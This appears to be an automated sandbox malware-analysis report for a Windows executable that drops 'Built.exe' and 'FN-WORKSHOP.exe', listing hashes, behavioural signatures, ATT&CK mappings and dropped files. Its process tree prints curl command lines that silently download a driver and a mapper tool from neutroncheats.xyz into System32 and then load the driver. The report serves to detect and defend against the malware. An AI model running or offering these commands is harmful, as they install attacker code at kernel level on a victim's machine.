fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a

Analysis

max time kernel
122s
max time network
127s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09-03-2024 00:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe
Size

8.5MB
MD5

05207286e06b3c6f978314eb23e12541
SHA1

90fc99af95fe9b25efa2f74671bc975a1c4f9865
SHA256

fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a
SHA512

4b6087a8440db233911c81689c494ec4fabd832efb3dd7345c26f6d1cf3fc2ac402cc7065f2fcbc441e1d8c6a428a55da51a310305e0cd006c8b103ac76ce382
SSDEEP

196608:wbNxKi/tHNOqURXShIZpcXAIkVxI2FdIcQ89eUllSJVI:wbzKi/6qUxBmAIkBFCyeUGVI

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
1636	Built.exe
2632	FN-WORKSHOP.exe
2668	Built.exe
1248	Process not Found

Loads dropped DLL 12 IoCs

pid	Process
2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe
2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe
2560	Process not Found
1636	Built.exe
2668	Built.exe
2668	Built.exe
2668	Built.exe
2668	Built.exe
2668	Built.exe
2668	Built.exe
2668	Built.exe
1248	Process not Found

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00050000000195ab-87.dat	upx
behavioral1/memory/2668-89-0x000007FEF54D0000-0x000007FEF5AC0000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 1636	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	28
PID 2844 wrote to memory of 1636	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	28
PID 2844 wrote to memory of 1636	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	28
PID 2844 wrote to memory of 1636	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	28
PID 2844 wrote to memory of 2632	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	29
PID 2844 wrote to memory of 2632	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	29
PID 2844 wrote to memory of 2632	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	29
PID 2844 wrote to memory of 2632	2844	fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe	29
PID 1636 wrote to memory of 2668	1636	Built.exe	31
PID 1636 wrote to memory of 2668	1636	Built.exe	31
PID 1636 wrote to memory of 2668	1636	Built.exe	31
PID 2632 wrote to memory of 2928	2632	FN-WORKSHOP.exe	32
PID 2632 wrote to memory of 2928	2632	FN-WORKSHOP.exe	32
PID 2632 wrote to memory of 2928	2632	FN-WORKSHOP.exe	32
PID 2632 wrote to memory of 1068	2632	FN-WORKSHOP.exe	33
PID 2632 wrote to memory of 1068	2632	FN-WORKSHOP.exe	33
PID 2632 wrote to memory of 1068	2632	FN-WORKSHOP.exe	33
PID 2632 wrote to memory of 1732	2632	FN-WORKSHOP.exe	34
PID 2632 wrote to memory of 1732	2632	FN-WORKSHOP.exe	34
PID 2632 wrote to memory of 1732	2632	FN-WORKSHOP.exe	34
PID 2632 wrote to memory of 1640	2632	FN-WORKSHOP.exe	35
PID 2632 wrote to memory of 1640	2632	FN-WORKSHOP.exe	35
PID 2632 wrote to memory of 1640	2632	FN-WORKSHOP.exe	35
PID 2632 wrote to memory of 1080	2632	FN-WORKSHOP.exe	36
PID 2632 wrote to memory of 1080	2632	FN-WORKSHOP.exe	36
PID 2632 wrote to memory of 1080	2632	FN-WORKSHOP.exe	36

C:\Users\Admin\AppData\Local\Temp\fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe
"C:\Users\Admin\AppData\Local\Temp\fc810301550036f739d42319724c398e97fd8d9b74cde2d5c6fa8e1f5b59bc1a.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2668
- C:\Users\Admin\AppData\Local\Temp\FN-WORKSHOP.exe
  "C:\Users\Admin\AppData\Local\Temp\FN-WORKSHOP.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent http://neutroncheats.xyz/cdn/skardrv.sys --output C:\Windows\System32\skardrv.sys >nul 2>&1
    3⤵
    PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent http://neutroncheats.xyz/cdn/mapper.exe --output C:\Windows\System32\mapper.exe >nul 2>&1
    3⤵
    PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\skardrv.sys
    3⤵
    PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent http://neutroncheats.xyz/cdn/fortnite.otf --output C:\Windows\System32\fortnite.otf >nul 2>&1
    3⤵
    PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
2.9MB

MD5
2d7c7e193af84fc9d7c137ebbb89c9f1

SHA1
0a97fd6cab1f6cf95050f6f4634fb78b369d2eb5

SHA256
cdfe4cb5c31c8d1c9e4bb8ed0f00fe2d24cb77483cbd93ae3f86af1e64a38395

SHA512
2e3eed35c99aeb2d5964067f9986edd557f45689d6ab7204045652929bb7d5553e18d3da97485560dc8a7c59170eecb5ca20e53e197e8f109a20304385f4f3e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
3.2MB

MD5
5bd0e748ec87e58c63d0f6a2facc91b1

SHA1
517b9739af8110c6f54a6e40d0a59231a6ed694b

SHA256
58935cb6eb547a49cff1c26f17bc186af025a9a2a4b86df90bb2f0b60c07969b

SHA512
55f8ddb02b4d4f1472c9132441ca90c7fe26959541d79590e60d5a73903a685a39203e99477e39f53166b7bda976946d5639c521e977502bc28a56d3fd48f4fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
2.4MB

MD5
f358817e43b875b15487a2e0f007bccd

SHA1
6de06e8f62c0d8260c2fac2d52893b1086110aca

SHA256
b205c10f8905f3f769ce844a205d0ea339ccb6324b54d56cfdfc0255a7d2d807

SHA512
0876b80c13a2ee104fa01d2204ec8218f28bb166fa71052f249521ac4f0ac9410c655e97f155153fabfa6482f8d12b7f9df0ad33b59623423a4db9f505a5151b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16362\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16362\python311.dll

Filesize
1.6MB

MD5
b167b98fc5c89d65cb1fa8df31c5de13

SHA1
3a6597007f572ea09ed233d813462e80e14c5444

SHA256
28eda3ba32f5247c1a7bd2777ead982c24175765c4e2c1c28a0ef708079f2c76

SHA512
40a1f5cd2af7e7c28d4c8e327310ea1982478a9f6d300950c7372634df0d9ad840f3c64fe35cc01db4c798bd153b210c0a8472ae0898bebf8cf9c25dd3638de8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16362\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
4.0MB

MD5
39132593abce466d11a63db530c37740

SHA1
9d2e46710697136c7faa279a77707361b6f03fe0

SHA256
8298f2faf039038895903ca274bbd2d36783bcb40ab2d60f0a96489e04cddf80

SHA512
7ded4e50ce146a7cdb8fe4c1690810f73a1be5853217d19cc77d256c7d9a6cb3897625e58edafb113c37c0d07bead2a2864076af10225777275b882ef2fedd73

Download Submit
\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
2.8MB

MD5
ca8b1f16b58595dda5cccc4b58731782

SHA1
64751b1561189a3b4409ffd0a808ffb7f0ebe5c8

SHA256
5ab3f757b91bfc4af8800287aa0dc7e3ed96e79ed34c1765e12a36ac5dfeebb4

SHA512
1fe707a29cbdea7215370ccfb54406be394db482309ef1f41032fe9272b3b651cf4a3e1eb81a445851ffb232ab196299dd5d3278a138e5f4243ed58742e8723c

Download Submit
\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
8.1MB

MD5
fa194ba939c2436f4c860b3dddb581f8

SHA1
d74ed50a6082d555d62b58b131dacbd6fcd23a49

SHA256
981e8d3728f3a4412e31893d03d0722d3dafc1616bc4a79ec7c9ed76122d8aa1

SHA512
95bce9a42eebe7ec63024979617866d7d2cc56a65d752bc94dbc63fbf9f081649f8d28adb61e8c55959b5a01af2aa46bb9b01679ce77ee41fecb4e305aebe8ef

Download Submit
\Users\Admin\AppData\Local\Temp\FN-WORKSHOP.exe

Filesize
374KB

MD5
6d127fa675a908b805431344e8ba4d6c

SHA1
0b62f9b06b5ae860b8d94cd64462833df70e5be3

SHA256
a097c4cf1b8ee8554d3ef664fb1b72f229f6ddde759548b854bee8b6a5524db3

SHA512
96841f4d07703ee62763e13fb08591c8597e759aad7510a91a6bfd590b9d2a337e8005bc89116eb444e21c26ce0f91744af7c3e7a43f4c6bdb355ff37d7505c7

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI16362\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
bcb8b9f6606d4094270b6d9b2ed92139

SHA1
bd55e985db649eadcb444857beed397362a2ba7b

SHA256
fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

SHA512
869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI16362\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
20ddf543a1abe7aee845de1ec1d3aa8e

SHA1
0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf

SHA256
d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8

SHA512
96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI16362\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
4380d56a3b83ca19ea269747c9b8302b

SHA1
0c4427f6f0f367d180d37fc10ecbe6534ef6469c

SHA256
a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a

SHA512
1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI16362\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
2554060f26e548a089cab427990aacdf

SHA1
8cc7a44a16d6b0a6b7ed444e68990ff296d712fe

SHA256
5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044

SHA512
fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

Download Submit
memory/2668-89-0x000007FEF54D0000-0x000007FEF5AC0000-memory.dmp

Filesize
5.9MB

Download